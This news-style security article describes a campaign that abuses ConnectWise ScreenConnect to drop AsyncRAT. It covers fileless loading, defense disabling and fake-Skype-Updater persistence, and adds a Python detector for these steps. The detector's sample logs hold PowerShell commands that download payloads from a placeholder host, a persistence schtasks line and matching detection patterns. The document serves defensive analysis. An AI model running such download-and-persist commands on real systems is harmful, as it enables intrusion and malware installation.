Attackers Abuse ConnectWise ScreenConnect to Drop AsyncRAT
A recent threat campaign has exposed a critical vulnerability in the widely used remote desktop and remote support software, ConnectWise ScreenConnect. Attackers have successfully exploited this weakness to deploy the AsyncRAT malware, compromising numerous endpoints and putting sensitive data at risk.
Exploiting the Weakness
The attack began with a compromised ScreenConnect client, which provided an entry point for the attackers to initiate an interactive session through a malicious domain (relay.shipperzone[.]online). This malicious domain was linked to unauthorized ScreenConnect deployments, allowing the threat actors to execute PowerShell commands that fetched two payloads from a remote server.
The payloads, logs.ldk and logs.ldr, were stored in the public folder and executed directly in memory using reflection. The attackers used a classic fileless malware trick to evade detection and defense by decoding and running .NET assemblies directly in memory instead of saving executables to disk.
The AsyncRAT Infection Chain
Once the payloads were executed, the Obfuscator.dll stage of the infection chain took over execution and set up persistence via a fake Skype Updater. The malware also disabled defenses such as AMSI and ETW, helping it remain active on the compromised system.
The AsyncRAT malware includes three core classes for initialization, dynamic payload loading, and anti-analysis tactics, making it difficult to detect and analyze. The malware's primary function is served by the AsyncClient.exe engine, which decrypts config with AES-256, connects to C2 servers, and parses commands via a custom protocol.
Key Features of AsyncRAT
The AsyncRAT attack chain features several key components:
- Obfuscator.dll: The first in-memory stage of the infection chain, launching execution and setting up persistence via a fake Skype Updater.
- AsyncClient.exe: The core C2 engine, decrypting config with AES-256, connecting to C2 servers, and parsing commands via a custom protocol.
- Keylogger and exfiltration tools: Used to monitor user activity and gather sensitive data like browser extensions.
Persistent Persistence
The malware maintains persistence via scheduled tasks using the CreateLoginTask() function, seen in Obfuscator.dll or redundantly recreated from AsyncClient. This ensures that even if the system reboots, the malware remains active and continues to execute its payload.
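As an added defender-side example (not code from the LevelBlue report), the following Python script flags the observable steps of this chain in constructed endpoint telemetry: a ScreenConnect client session to a relay outside the organisation's allowlist, PowerShell writing logs.ldk and logs.ldr into the Public folder, and a scheduled task named "Skype Updater". The log format, the allowlisted relay host and the download URL are assumptions.

```python
import re

# Hypothetical allowlist of relay hosts the organisation actually deploys; a session to any
# other relay is treated as an unauthorised ScreenConnect deployment, as in this campaign.
KNOWN_RELAYS = {"relay.example-msp.internal"}

# Indicators taken from the report: an unknown relay host, PowerShell dropping .ldk/.ldr
# files into the Public folder, and a "Skype Updater" scheduled task used for persistence.
RELAY_RE = re.compile(r"ScreenConnect\.ClientService.*?relay=(?P<host>[\w.\-]+)", re.I)
DROP_RE = re.compile(r"powershell.*?(?P<path>C:\\Users\\Public\\\S+\.ld[kr])", re.I)
TASK_RE = re.compile(r'schtasks.*?/tn\s+"?(?P<task>[^"]*Skype Updater[^"]*)', re.I)

# Constructed sample telemetry (the line format and the download URL are placeholders, not
# from the report); the WS02 entries reproduce the chain the report describes.
SAMPLE_LOG = [
    "2024-05-01T10:02:11Z host=WS01 proc=ScreenConnect.ClientService.exe relay=relay.example-msp.internal",
    "2024-05-01T10:05:43Z host=WS02 proc=ScreenConnect.ClientService.exe relay=relay.shipperzone.online",
    "2024-05-01T10:06:02Z host=WS02 proc=powershell.exe cmd=iwr http://REMOTE-SERVER-PLACEHOLDER/logs.ldk"
    " -OutFile C:\\Users\\Public\\logs.ldk",
    "2024-05-01T10:06:03Z host=WS02 proc=powershell.exe cmd=iwr http://REMOTE-SERVER-PLACEHOLDER/logs.ldr"
    " -OutFile C:\\Users\\Public\\logs.ldr",
    '2024-05-01T10:06:30Z host=WS02 proc=schtasks.exe cmd=schtasks /create /tn "Skype Updater"'
    " /tr C:\\Users\\Public\\update.exe /sc onlogon",
    '2024-05-01T10:07:00Z host=WS03 proc=schtasks.exe cmd=schtasks /create /tn "Backup Nightly" /sc daily',
]

def detect(lines, known_relays=KNOWN_RELAYS):
    """Return (host, rule, detail) for every line that matches one of the campaign indicators."""
    findings = []
    for line in lines:
        host_m = re.search(r"host=(\S+)", line)
        host = host_m.group(1) if host_m else "?"
        m = RELAY_RE.search(line)
        if m and m.group("host").lower() not in known_relays:
            findings.append((host, "unauthorised-screenconnect-relay", m.group("host")))
        m = DROP_RE.search(line)
        if m:
            findings.append((host, "powershell-ldk-ldr-drop-in-public", m.group("path")))
        m = TASK_RE.search(line)
        if m:
            findings.append((host, "fake-skype-updater-task", m.group("task")))
    return findings

def correlate(findings):
    """Per host: 'chain' when two or more distinct rules fire (relay, drop, persistence), else 'single'."""
    rules_by_host = {}
    for host, rule, _ in findings:
        rules_by_host.setdefault(host, set()).add(rule)
    return {h: ("chain" if len(r) >= 2 else "single") for h, r in rules_by_host.items()}
```

Running `correlate(detect(SAMPLE_LOG))` on the constructed lines rates WS02 as a full chain because all three indicators fire on that host, while WS01's session to the allowlisted relay and WS03's ordinary scheduled task produce no finding.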
A Warning for IT Professionals
LevelBlue researchers warn of a growing threat campaign abusing ConnectWise ScreenConnect to deploy AsyncRAT. The attack highlights the importance of staying vigilant and up-to-date with security patches and best practices to prevent such vulnerabilities from being exploited in the future.
As one researcher noted, "Fileless malware continues to evade modern defenses due to its stealthy nature and reliance on legitimate system tools for execution." This approach bypasses traditional disk-based detection by operating in memory, making these threats harder to detect, analyze, and eradicate. It is essential for IT professionals, MSPs, and businesses to be aware of this threat and take proactive measures to secure their systems.